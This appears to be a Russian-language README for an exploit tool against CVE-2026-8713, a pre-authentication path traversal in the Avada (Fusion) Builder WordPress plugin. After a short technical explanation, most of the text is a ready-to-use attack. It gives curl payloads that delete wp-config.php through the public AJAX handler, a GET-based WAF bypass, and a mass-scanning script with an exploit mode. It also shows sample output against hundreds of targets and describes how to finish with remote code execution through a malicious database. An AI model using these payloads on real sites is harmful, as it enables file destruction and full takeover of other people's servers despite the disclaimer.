
Обход пути без аутентификации до произвольного удаления файлов в Avada (Fusion) Builder <= 3.15.3, приводящий к выполнению произвольного кода (RCE) (CVSS 9.1)
CVE-2026-8713 — критическая уязвимость с рейтингом CVSS 9.1 в плагине/теме Avada (Fusion) Builder для WordPress. Функция maybe_delete_files() в классе Fusion_Form_DB_Entries формирует пути к файловой системе на основе значений полей формы, контролируемых атакующим, используя простую замену строк — без проверки или ограничений по каталогам.
realpath()Неаутентифицированный атакующий отправляет payload с path traversal через обработчик fusion_form_submit_ajax. Когда хук завершения работы Fusion_Form_DB_Privacy обрабатывает запись с privacy_expiration_action=delete, целевой файл удаляется с сервера.
| Версия | Статус |
|---|---|
| Fusion Builder ≤ 3.15.3 | Уязвима |
| Fusion Builder ≥ 3.15.4 | Исправлена |
| Тема Avada (все версии) | Встроенный плагин может быть уязвим |
Примечание: Номер версии темы Avada (7.x) отличается от номера версии плагина Fusion Builder (3.x). Уязвимость находится в плагине, но сканер определяет обе составляющие.
В файле fusion-builder/inc/class-fusion-form-db-entries.php метод maybe_delete_files() вычисляет пути к файлам с помощью замены строк без проверки изоляции каталогов:
$file_path = str_replace($upload['url'], $upload['path'], $value);
// Проверка realpath() отсутствует — последовательности path traversal проходят
unlink($file_path);
1. Атакующий отправляет форму Avada через wp_ajax_nopriv_fusion_form_submit_ajax
→ Path traversal: ../../wp-config.php
→ privacy_expiration_action = delete
→ privacy_expiration_interval = 0
2. Хук завершения работы WordPress запускает Fusion_Form_DB_Privacy
→ Обрабатывает сохранённую запись формы
→ Вызывает maybe_delete_files() для пути, контролируемого атакующим
→ wp-config.php удалён
3. WordPress переходит в режим установки/настройки
→ Атакующий подключает сайт к вредоносной базе данных
→ Полное удалённое выполнение кода
Обработчик AJAX зарегистрирован с помощью wp_ajax_nopriv_, что делает его доступным для неаутентифицированных пользователей:
POST /wp-admin/admin-ajax.php
action=fusion_form_submit_ajax
form_id=<id>
privacy_expiration_action=delete
fusion_privacy_expiration_interval=0
fusion_form_field_<name>=../../wp-config.php
Многие хостинги блокируют POST-запросы к /wp-admin/admin-ajax.php. WordPress принимает параметры через GET на этой же конечной точке, что даёт тривиальный способ обхода:
GET /wp-admin/admin-ajax.php?action=fusion_form_submit_ajax&form_id=<id>&privacy_expiration_action=delete&...
git clone https://github.com/shinthink/CVE-2026-8713.git
cd CVE-2026-8713
pip install -r requirements.txt
# Только обнаружение (по умолчанию — без удаления файлов)
python cve_2026_8713.py -t target.com
# Массовое обнаружение
python cve_2026_8713.py -f targets.txt
# Режим эксплуатации — удалить wp-config.php
python cve_2026_8713.py -t target.com --exploit
# Удаление произвольного файла
python cve_2026_8713.py -t target.com --exploit --delete "../../../debug.log"
-t, --target Одна цель (домен или IP)
-f, --file Список целей, по одной на строку
--exploit Включить удаление файлов (по умолчанию: только обнаружение)
--delete PATH Путь к произвольному файлу для удаления (по умолчанию: wp-config.php)
-o, --output Сохранить результаты в файл
--threads Количество потоков (по умолчанию: 20)
-v, --verbose Показывать подробный вывод
$ python cve_2026_8713.py -f targets.txt
CVE-2026-8713 Avada (Fusion) Builder | CVSS 9.1
Mode: Detection | Targets: 521 | Workers: 20
───────────────────────────────────────────────────────
[EXPLOIT] target-vuln.com 1.2s form #3 (AJAX open)
[VULN] target-waf.com 2.1s form #1 (WAF blocked)
[AVADA] target-noform.com 0.5s (no form found)
[-] target-noavada.com 0.3s
───────────────────────────────────────────────────────
Scan complete | Time: 45s
───────────────────────────────────────────────────────
Targets : 521
Avada detected : 47
Forms found : 12
Vulnerable : 9
$ python cve_2026_8713.py -t target.com --exploit -v
CVE-2026-8713 — Avada Builder Exploit
CVSS 9.1 | Pre-Auth | Path Traversal → File Delete → RCE
[+] Found Avada form: id=3
[+] POST form_id=3: HTTP 403 (WAF blocked)
[+] GET form_id=3: HTTP 200 (WAF bypassed)
Host : target.com
Avada : YES
Form : 3
Deleted : wp-config.php (force reinstall → RCE)
Time : 3.2s
Шаг 1 — Проверить Avada
curl -sk 'https://target.com/wp-content/themes/Avada/style.css' | head -5
Шаг 2 — Найти ID формы
curl -sk 'https://target.com/' | grep -oP 'fusion-form[^"]*form-id=["\x27](https://github.com/shinthink/cve-2026-8713/blob/main/%5Cd%2B)'
Шаг 3 — Отправить форму с path traversal
curl -sk -X POST \
-d 'action=fusion_form_submit_ajax' \
-d 'form_id=3' \
-d 'privacy_expiration_action=delete' \
-d 'fusion_privacy_expiration_interval=0' \
-d 'fusion_form_field_x=../../wp-config.php' \
'https://target.com/wp-admin/admin-ajax.php'
Шаг 4 — Обход WAF (если POST заблокирован)
curl -sk 'https://target.com/wp-admin/admin-ajax.php?action=fusion_form_submit_ajax&form_id=3&privacy_expiration_action=delete&fusion_privacy_expiration_interval=0&fusion_form_field_x=../../wp-config.php'
Шаг 5 — Проверить и применить RCE
# Сайт в режиме установки?
curl -sk -o /dev/null -w '%{http_code}' 'https://target.com/wp-admin/install.php'
# HTTP 200 → wp-config удалён → подключить вредоносную БД → полный RCE
ТОЛЬКО В ОБРАЗОВАТЕЛЬНЫХ ЦЕЛЯХ И ДЛЯ АВТОРИЗОВАННОГО ТЕСТИРОВАНИЯ.
Данное программное обеспечение предназначено для специалистов по безопасности, проводящих авторизованные тесты на проникновение, организаций, проверяющих собственную инфраструктуру, и исследователей, изучающих эксплуатацию уязвимостей.
Несанкционированный доступ к компьютерным системам незаконен и может нарушать:
- США: Закон о компьютерном мошенничестве и злоупотреблениях (18 U.S.C. 1030)
- Индонезия: UU ITE, статьи 30 и 46
- Европейский союз: Директива 2013/40/EU
- Великобритания: Закон о неправомерном использовании компьютеров 1990 г.
Авторы не несут ответственности за неправомерное использование.
| Ресурс | Ссылка |
|---|---|
| Уведомление IONIX | ionix.io/threat-center/cve-2026-8713 |
| Уведомление Wordfence | wordfence.com |
| Patchstack | patchstack.com |
| Запись NVD | CVE-2026-8713 |
Этот проект не связан с ThemeFusion или Avada.